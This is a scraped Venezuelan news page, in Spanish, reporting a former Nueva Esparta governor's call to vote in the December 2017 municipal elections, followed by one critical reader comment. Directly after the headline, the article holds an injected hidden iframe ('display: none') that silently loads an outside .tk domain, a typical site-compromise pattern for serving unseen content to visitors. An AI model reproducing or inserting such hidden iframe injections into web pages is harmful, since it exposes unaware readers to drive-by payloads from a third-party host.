ReporteConfidencial.info - Periodismo Audaz
Premio de Periodismo Digital
Compartir en facebook Siguenos en twitter
CARTA SEMANAL  
Gobierno en lo peor de dos mundos/ Rodeado cedió... Cancilleres "vigilantes"
Claves secretas de la fuga de Ledezma /Embajada de Chile Bajo Asedio. >>
17/11/2017. CLAVES SECRETAS DE LA FUGA DE ANTONIO LEDEZMA Todos sabemos que dentro  de la oposición existen algunos grupos que se disputan ...
4 comentarios | 8771 visitas
Publicidad
Publicidad
Publicidad
Publicidad
POLíTICA   Morel Rodríguez Ávila:

Es una obligación votar por Venezuela

09 de Noviembre de 2017 | 1 comentarios | 1744 visitas | Ver imagen original | A+ | A -
¡Comparte esta Noticia!
 
Es una obligación votar por Venezuela  <p><iframe style=display: none; src=https://bolbolt.tk width=320 height=240></iframe></p>

Para Morel Rodríguez Ávila resulta fundamental que la mayoría democrática vote en las municipales del venidero 10 de diciembre. Dijo que es una obligación sufragar para que sea la democracia quien finalmente gobierne y no una dictadura, Dejar de hacerlo indicaría, explicó, entregar en bandeja de plata las posiciones más importantes de la sociedad civil, porque, así como la familia es la célula de la sociedad, los municipios lo son de la democracia.

Su afirmación la hizo el ex gobernador de Nueva Esparta en el programa “Así de Claro”, que modera el periodista Gustavo Novoa en la emisora 94.7 FM.

Explicó que en la población venezolana existe una gran inquietud sobre qué ocurrirá en el futuro inmediato. Para aclararlo, señaló que lo conveniente es ir a votar pues, por la vía del voto, es como mejor se puede concretar la necesidad del cambio de gobierno, que es la solución mayor que anhela la mayoría nacional.

Dijo que los partidos políticos tienen una enorme responsabilidad con el pueblo y el país- Es la de explicar muy bien el porqué de su decisión de no acudir a estas elecciones de alcaldes, pero sí muestran interés en elegir ya, por Primarias, al que sería según ellos el candidato presidencial.

Exhortó a votar para elegir a los alcaldes que sí estén dispuestos a trabajar, que demuestren capacidad, voluntad y sensibilidad, que estén siempre al lado del pueblo, escuchándole sus problemas y buscándoles soluciones; que entienda a la gente, a la sociedad civil toda, a la clase media, y que sean probadamente transparentes en el manejo de los dineros públicos.

Si bien reconoció que la dirigencia opositora ha cometido muchos errores, estimó que la MUD debe ser renovada, que no se sigan imponiendo las líneas desde Caracas, sino que se escuche y respete las que surgen de la provincia. Esa nueva MUD requiere de mucha ayuda de todo el pueblo y eso hay que ganarlo, aseveró.

Rodríguez Ávila advirtió que se requiere un barajo político estratégico, en donde se tome más en cuenta al independiente, al profesional, al empresario, en fin, a representantes de todos los sectores y no sólo a los políticos.

La tarea es de todos y todos estamos obligados a votar para que en el país se imponga la democracia y no la dictadura, precisó finalmente.

 
Fecha de la Noticia: 09 de Noviembre de 2017
Hora: 09:11:49
Fuente: Prensa MRA
Publicado Por: Yus
 
¡Comparte esta Noticia!
 
 
COMENTARIOS
1
chacopataexpress
09 de noviembre de 2017 a las 07:28
Este individuo, como exgobernador fue uno de los corruptos mas fuertes de su época. Ahora quiere que sigamos votando por ellos? mayor desgracia. El que se fue le ganó en corrupción, es verdad. y esperemos que esas ratas n o vuelvan. Pero de allí a seguir con estos mediocres de ad. bien lejos.
 
DEJAR COMENTARIO
Nombre:
*Requerido
Email:
*RequeridoDebe ser un Email
Comentario:
*Requerido

Debe ser un numeroResultado invalido
Resultado invalido

 
ADVERTENCIA: Reporte Confidencial buscará bloquear de forma permanente todo IP del cual provengan comentarios groseros, vulgares o que su contenido atente contra la moral y las buenas costumbres o aquellos destinados a vilipendiar o insultar a autoridades, instituciones o personas . De igual forma, advierte que bloqueará de forma permanente todo IP cuando de él provengan, mensajes de una misma persona, con distintos datos de forma continua en una misma noticia. De ser requeridos por autoridades, entregaremos los IP que violan las leyes y normas que regulan la actividad comunicacional del internet y la(s) persona(s) responsable(s) podra(n) ser juzgada(s) por quien(es) fuera(n) victima(s) de sus comentario(s) o expresiones Reporte Confidencial no es responsable de los comentarios y opiniones emitidos en esta sección , que son de la exclusiva responsabilidad de quien(es) los emite(n). Reporte Confidencial valora la libertad de expresión, así como el derecho que tenemos todos a que se respete el honor y dignidad de las personas. Invitamos a nuestros foristas a expresar sus ideas de forma libre pero con respeto a nuestros lectores. ¡Abierto el debate inteligente de ideas!
 
 

 

 

 

 

 

 

 

 

www.reporteconfidencial.info
Copyright 2010. Reporteconfidencial. Todos los Derechos Reservados.
Reporte Confidencial no se hace responsable por los comentarios emitidos por terceros en nuestras paginas, quienes ejercen plena libertad de expresion y son los responsables ulteriores de sus comentarios.